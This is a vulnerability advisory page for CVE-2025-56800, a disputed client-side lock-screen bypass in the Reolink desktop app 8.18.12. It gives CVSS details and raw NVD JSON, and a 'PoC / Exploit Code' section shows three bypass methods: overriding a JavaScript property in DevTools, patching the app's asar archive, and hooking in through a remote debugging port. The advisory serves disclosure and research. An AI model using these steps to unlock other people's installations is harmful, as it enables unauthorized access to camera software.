Security Vulnerability Report

CVE-2025-56800

Published: 2025-10-21 19:21:23
Last Modified: 2025-11-17 12:46:26

Description

Reolink desktop application 8.18.12 contains a vulnerability in its local authentication mechanism. The application implements lock screen password logic entirely on the client side using JavaScript within an Electron resource file. Because the password is stored and returned via a modifiable JavaScript property (a.settingsManager.lockScreenPassword), an attacker can patch the return value to bypass authentication. NOTE: this is disputed by the Supplier because the lock-screen bypass would only occur if the local user modified his own instance of the application.

CVSS Details

CVSS Score: 5.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
(Attack Vector: Local; Attack Complexity: Low; Privileges Required: None; User Interaction: None; Scope: Unchanged; Confidentiality: Low; Integrity: Low; Availability: None)
Weakness: CWE-290 (Authentication Bypass by Spoofing)

Configurations (Affected Products)

cpe:2.3:a:reolink:reolink:8.18.12:*:*:*:desktop:*:*:* - VULNERABLE
Reolink Desktop Application 8.18.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
/*
 * CVE-2025-56800 - Reolink Desktop Application Lock Screen Bypass PoC
 * Vulnerability: Client-side authentication bypass via modifiable JavaScript property
 * Target: Reolink Desktop Application 8.18.12 (Electron-based)
 */

// Method 1: Modify the lockScreenPassword property directly via DevTools Console
// Open DevTools (Ctrl+Shift+I or via menu) and execute in the Console tab.
// Caveat: `a` is the minified bundle identifier quoted in the advisory, not a
// global; it is only reachable from the console if the bundle exposes it or if
// you pause at a breakpoint inside that module's scope.

// Step 1: Locate the settingsManager object
const settingsManager = a.settingsManager;

// Step 2: Override the lockScreenPassword property to a known value
Object.defineProperty(settingsManager, 'lockScreenPassword', {
  value: 'bypass_password',
  writable: true,
  configurable: true
});

// Step 3: Alternatively, override the getter to always return a known password
Object.defineProperty(settingsManager, 'lockScreenPassword', {
  get: function () { return 'bypass_password'; },
  set: function () {},
  configurable: true
});

// Step 4: Enter 'bypass_password' in the lock screen to bypass authentication

// Method 2: Patch the asar archive directly
// Extract the asar file:
//   npx asar extract app.asar ./app_extracted
//
// Modify the JavaScript file containing the password comparison logic:
//   Find:         if (inputPassword === a.settingsManager.lockScreenPassword) { ... }
//   Replace with: if (true) { ... }
//
// Repackage the asar file:
//   npx asar pack ./app_extracted ./app_modified.asar
// Replace the original app.asar with the modified version and restart the application.
// Caveat: this only works on builds that do not enforce asar integrity validation.

// Method 3: Runtime hook using Electron debugging port
// Launch the application with remote debugging enabled:
//   ./Reolink --remote-debugging-port=9222
//
// Connect via Chrome DevTools at chrome://inspect and execute the property
// override as shown in Method 1.

References

https://github.com/shinyColumn/CVE-2025-56800 (Exploit, Third Party Advisory)
https://shinycolumn.notion.site/reolink-auth-bypass (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-56800",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-21T19:21:22.780",
    "lastModified": "2025-11-17T12:46:26.313",
    "vulnStatus": "Analyzed",
    "cveTags": [
      {"sourceIdentifier": "[email protected]", "tags": ["disputed"]}
    ],
    "descriptions": [
      {"lang": "en", "value": "Reolink desktop application 8.18.12 contains a vulnerability in its local authentication mechanism. The application implements lock screen password logic entirely on the client side using JavaScript within an Electron resource file. Because the password is stored and returned via a modifiable JavaScript property(a.settingsManager.lockScreenPassword), an attacker can patch the return value to bypass authentication. NOTE: this is disputed by the Supplier because the lock-screen bypass would only occur if the local user modified his own instance of the application."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-290"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:reolink:reolink:8.18.12:*:*:*:desktop:*:*:*",
                "matchCriteriaId": "30EFCAEB-546D-449F-A08D-360DFF9CE745"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/shinyColumn/CVE-2025-56800",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://shinycolumn.notion.site/reolink-auth-bypass",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}